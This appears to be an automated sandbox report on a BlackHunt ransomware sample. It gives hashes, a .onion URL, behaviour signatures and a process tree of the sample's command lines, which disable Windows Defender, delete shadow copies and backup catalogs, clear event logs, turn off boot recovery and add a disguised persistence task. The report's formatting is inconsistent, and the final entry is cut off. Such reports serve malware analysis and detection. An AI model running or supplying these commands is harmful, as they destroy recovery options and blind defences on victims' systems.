Analysis
  max time kernel:  9s
  max time network: 137s
  platform:         windows10-2004_x64
  resource:         win10v2004-20231222-en
  resource tags:    arch:x64, arch:x86, image:win10v2004-20231222-en, locale:en-us, os:windows10-2004-x64, system
  submitted:        19/01/2024, 00:56
Static task: static1

Behavioral task: behavioral1
  Sample:   cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
  Resource: win7-20231215-en

Behavioral task: behavioral2
  Sample:   cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
  Resource: win10v2004-20231222-en
General
  Target: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
  Size:   707KB
  MD5:    fe824c146fe0974cf6b1b87f30034caf
  SHA1:   8a2d1d2556c080482bab8e5b06d0072a8325ebff
  SHA256: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022
  SHA512: 18a2115f9b5ae8a3bf93352d7af652b0685b5ad4a57014b9faee4e29972fce06205a0c3f5732bcea66aa24e50b65f462a6182d1dfb9dce379cbb193a1940d9cc
  SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1l8Evnh:6uaTmkZJ+naie5OTamgEoKxLWw6h
Malware Config
  Extracted from: C:\ProgramData\#BlackHunt_ReadMe.hta
  URL:            http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures

Deletes NTFS Change Journal (2 TTPs, 2 IoCs)
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
  pid    Process
  10856  fsutil.exe
  10464  fsutil.exe

Registry IoCs listed without a signature heading in the extracted report:
  description     | ioc | Process
  Key created     | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | cmd.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | cmd.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
Clears Windows event logs (1 TTPs, 5 IoCs)
  pid    Process
  9880   wevtutil.exe
  10232  wevtutil.exe
  5808   wevtutil.exe
  11272  wevtutil.exe
  9028   wevtutil.exe

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit (1 TTPs, 4 IoCs)
  pid    Process
  6616   bcdedit.exe
  10436  bcdedit.exe
  11664  bcdedit.exe
  6020   bcdedit.exe

Renames multiple (1123) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

Process IoCs listed without a signature heading in the extracted report (PID 13164 appears under "Deletes backup catalog" in the process tree):
  pid    Process
  13164  wbadmin.exe
  13008  wbadmin.exe
Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
  description       | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe

Adds Run key to start application (2 TTPs, 1 IoCs)
  description     | ioc | Process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" | reg.exe

Registry IoC listed without a signature heading in the extracted report:
  description     | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
Enumerates connected drives (3 TTPs, 23 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
  description: File opened (read-only)
  Process:     cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
  ioc (23 drive roots, in the order reported):
    \??\E: \??\Y: \??\J: \??\V: \??\N: \??\W: \??\I: \??\S: \??\H: \??\L: \??\X: \??\Z:
    \??\Q: \??\R: \??\T: \??\O: \??\P: \??\A: \??\G: \??\B: \??\U: \??\K: \??\M:
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  9     ip-api.com

Drops file in Program Files directory (64 IoCs)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Program crash (1 IoCs)
  pid  pid_target  Process       procid_target
  232  11964       WerFault.exe  254

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid    Process
  11284  schtasks.exe

Interacts with shadow copies (2 TTPs, 6 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
  pid    Process
  10732  vssadmin.exe
  11244  vssadmin.exe
  9316   vssadmin.exe
  10924  vssadmin.exe
  10908  vssadmin.exe
  10380  vssadmin.exe

Kills process with taskkill (1 IoCs)
  pid    Process
  12436  taskkill.exe

Modifies registry class (12 IoCs)
  description     | ioc | Process
  Key created     | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon | reg.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | reg.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | reg.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ | reg.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ | reg.exe
  Key created     | \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon | reg.exe
  Key created     | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 | reg.exe
  Key created     | \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon | reg.exe
  Key created     | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 | reg.exe
  Key created     | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon | reg.exe
  Key created     | \REGISTRY\MACHINE\Software\Classes\.Hunt2 | reg.exe
  Key created     | \REGISTRY\MACHINE\Software\Classes\Hunt2 | reg.exe

Runs ping.exe (1 TTPs, 1 IoCs)
  pid   Process
  5172  PING.EXE

Suspicious use of AdjustPrivilegeToken (7 IoCs)
  description                        | pid  | Process
  Token: SeDebugPrivilege            | 1144 | cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
  Token: SeRestorePrivilege          | 1144 | cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
  Token: SeBackupPrivilege           | 1144 | cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
  Token: SeTakeOwnershipPrivilege    | 1144 | cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
  Token: SeAuditPrivilege            | 1144 | cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
  Token: SeSecurityPrivilege         | 1144 | cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
  Token: SeIncBasePriorityPrivilege  | 1144 | cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe

Suspicious use of WriteProcessMemory (64 IoCs)
System policy modification (1 TTPs, 3 IoCs)
  description     | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
  Key created     | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
Processes
(indentation shows the parent/child depth that the original report marked as 1, 2 and 3)

C:\Users\Admin\AppData\Local\Temp\cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe"
  - UAC bypass
  - Checks computer location settings
  - Checks whether UAC is enabled
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID: 1144

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
      PID: 740

        C:\Windows\system32\reg.exe
          cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
          PID: 5128

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
      PID: 1612

        C:\Windows\system32\reg.exe
          cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
          PID: 8560

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
      PID: 3528

        C:\Windows\system32\reg.exe
          cmdline: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
          PID: 12452

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
      PID: 5084

        C:\Windows\system32\reg.exe
          cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
          PID: 12440

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
      PID: 4440

        C:\Windows\system32\vssadmin.exe
          cmdline: vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
          - Interacts with shadow copies
          PID: 11244

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
      PID: 5204

        C:\Windows\system32\wbadmin.exe
          cmdline: wbadmin.exe delete catalog -quiet
          - Deletes backup catalog
          PID: 13164

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
      PID: 5260

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
      PID: 5188

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
      PID: 5168

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
      PID: 316

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
      PID: 2188

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
      PID: 1136

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
      PID: 2240

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
      PID: 4860

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe" /F
      PID: 3672

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
      PID: 1560

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
      PID: 3988

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
      PID: 4700

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
      PID: 5044

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
      PID: 3364

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
      PID: 5112

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
      PID: 4812

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
      PID: 2748

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
      PID: 2724

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
      PID: 60

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
      PID: 4720

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
      PID: 2352

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
      PID: 3188

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
      PID: 1836

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
      PID: 2184

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
      PID: 3872

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
      PID: 4368

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
      PID: 3660

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      PID: 2628

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      PID: 1692
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1176
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1128
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1460
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4300
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3036
-
-
  - C:\Windows\System32\cmd.exe (PID 5104)
    Command line: "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
    - C:\Windows\system32\fsutil.exe (PID 6836)
      Command line: fsutil usn deletejournal /D M:\
  - C:\Windows\System32\cmd.exe (PID 6296)
    Command line: "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
    - C:\Windows\system32\wevtutil.exe (PID 5808)
      Command line: wevtutil.exe cl Security
      Signatures: Clears Windows event logs
  - C:\Windows\System32\cmd.exe (PID 4672)
    Command line: "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
    - C:\Windows\system32\wbadmin.exe (PID 13008)
      Command line: wbadmin.exe delete catalog -quiet
      Signatures: Deletes backup catalog
  - C:\Windows\System32\cmd.exe (PID 2976)
    Command line: "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
    Signatures: Modifies Windows Defender Real-time Protection settings
    - C:\Windows\system32\reg.exe (PID 6604)
      Command line: REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
  - C:\Windows\System32\cmd.exe (PID 6888)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
    - C:\Windows\system32\reg.exe (PID 3004)
      Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
  - C:\Windows\SysWOW64\cmd.exe (PID 6256)
    Command line: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe"
    - C:\Windows\SysWOW64\PING.EXE (PID 5172)
      Command line: ping 127.0.0.1 -n 5
      Signatures: Runs ping.exe
  - C:\Windows\System32\cmd.exe (PID 6300)
    Command line: "C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta
  - C:\Windows\System32\cmd.exe (PID 6288)
    Command line: "C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
  - C:\Windows\System32\cmd.exe (PID 5164)
    Command line: "C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
  - C:\Windows\System32\cmd.exe (PID 11076)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
  - C:\Windows\System32\cmd.exe (PID 11136)
    Command line: "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
  - C:\Windows\System32\cmd.exe (PID 6996)
    Command line: "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
  - C:\Windows\System32\cmd.exe (PID 9872)
    Command line: "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  - C:\Windows\System32\cmd.exe (PID 9548)
    Command line: "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
  - C:\Windows\System32\cmd.exe (PID 9516)
    Command line: "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  - C:\Windows\System32\cmd.exe (PID 9108)
    Command line: "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
  - C:\Windows\System32\cmd.exe (PID 6684)
    Command line: "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
  - C:\Windows\System32\cmd.exe (PID 4324)
    Command line: "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
  - C:\Windows\System32\cmd.exe (PID 4460)
    Command line: "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
  - C:\Windows\System32\cmd.exe (PID 10136)
    Command line: "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
  - C:\Windows\System32\cmd.exe (PID 10040)
    Command line: "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
  - C:\Windows\System32\cmd.exe (PID 8932)
    Command line: "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
  - C:\Windows\System32\cmd.exe (PID 10760)
    Command line: "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
- C:\Windows\system32\reg.exe (PID 4740)
  Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
  Signatures: Modifies registry class
- C:\Windows\system32\reg.exe (PID 4924)
  Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 8568)
  Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 11272)
  Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 11028)
  Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 8552)
  Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
- C:\Windows\system32\reg.exe (PID 6592)
  Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 12460)
  Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 12444)
  Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
- C:\Windows\system32\bcdedit.exe (PID 6616)
  Command line: bcdedit /set {default} recoveryenabled No
  Signatures: Modifies boot configuration data using bcdedit
- C:\Windows\system32\vssadmin.exe (PID 10732)
  Command line: vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
  Signatures: Interacts with shadow copies
- C:\Windows\system32\vssadmin.exe (PID 9316)
  Command line: vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
  Signatures: Interacts with shadow copies
- C:\Windows\system32\vssadmin.exe (PID 10924)
  Command line: vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
  Signatures: Interacts with shadow copies
- C:\Windows\system32\schtasks.exe (PID 11284)
  Command line: SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe" /F
  Signatures: Creates scheduled task(s)
- C:\Windows\system32\vssvc.exe (PID 7548)
  Command line: C:\Windows\system32\vssvc.exe
- C:\Windows\system32\vssadmin.exe (PID 10908)
  Command line: vssadmin.exe Delete Shadows /all /quiet
  Signatures: Interacts with shadow copies
- C:\Windows\system32\wbengine.exe (PID 12304)
  Command line: "C:\Windows\system32\wbengine.exe"
- C:\Windows\system32\schtasks.exe (PID 10680)
  Command line: schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
- C:\Windows\system32\fsutil.exe (PID 10856)
  Command line: fsutil.exe usn deletejournal /D C:
  Signatures: Deletes NTFS Change Journal
- C:\Windows\system32\bcdedit.exe (PID 10436)
  Command line: bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  Signatures: Modifies boot configuration data using bcdedit
- C:\Windows\System32\vdsldr.exe (PID 6212)
  Command line: C:\Windows\System32\vdsldr.exe -Embedding
- C:\Windows\System32\vds.exe (PID 8976)
  Command line: C:\Windows\System32\vds.exe
- C:\Windows\system32\reg.exe (PID 6448)
  Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 912)
  Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 12424)
  Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 10492)
  Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 10452)
  Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 6108)
